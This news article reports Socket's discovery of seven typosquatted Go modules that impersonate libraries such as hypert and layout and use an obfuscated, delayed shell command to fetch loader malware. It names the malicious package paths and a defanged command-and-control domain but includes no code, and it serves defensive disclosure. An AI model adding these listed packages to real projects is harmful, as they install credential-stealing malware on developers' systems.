Cybersecurity experts have issued a warning about a continuing malicious campaign that targets the Go ecosystem with typosquatted modules designed to deploy loader malware on Linux and macOS systems.
According to Socket researcher Kirill Boychenko, a new report indicates that at least seven packages have been published, impersonating popular Go libraries, including one (github[.]com/shallowmulti/hypert) aimed specifically at financial-sector developers.
“These packages exhibit repeated malicious filenames and consistent obfuscation techniques, which point to a coordinated threat actor capable of rapid adaptation,” Boychenko said.
Although these packages remain accessible via the official package repository, their corresponding GitHub repositories, except for “github[.]com/ornatedoctrin/layout”, have been taken down. Below is a list of the malicious Go packages identified:
shallowmulti/hypert (github.com/shallowmulti/hypert)
shadowybulk/hypert (github.com/shadowybulk/hypert)
belatedplanet/hypert (github.com/belatedplanet/hypert)
thankfulmai/hypert (github.com/thankfulmai/hypert)
vainreboot/layout (github.com/vainreboot/layout)
ornatedoctrin/layout (github.com/ornatedoctrin/layout)
utilizedsun/layout (github.com/utilizedsun/layout)
An analysis by Socket revealed that these fake packages contain code designed for remote code execution. This is achieved by executing an obfuscated shell command to fetch and run a script from a remote server (“alturastreet[.]icu”). In an apparent effort to avoid detection, the remote script is delayed for one hour before being fetched.
The attack’s primary objective is to install and execute a malicious file that could potentially steal sensitive data or credentials.
This disclosure follows a previous report by Socket, which uncovered a similar software supply chain attack targeting the Go ecosystem through a malicious package that could provide the attacker with remote access to compromised systems.
“The repeated use of identical filenames, string obfuscation techniques, and delayed execution tactics suggest a coordinated adversary with plans to persist and evolve,” Boychenko commented.
“The discovery of numerous malicious hypert and layout packages, coupled with multiple fallback domains, indicates a well-established infrastructure designed for long-term operation. This allows the threat actor to adapt and pivot whenever a domain or repository is blacklisted or removed,” he concluded.
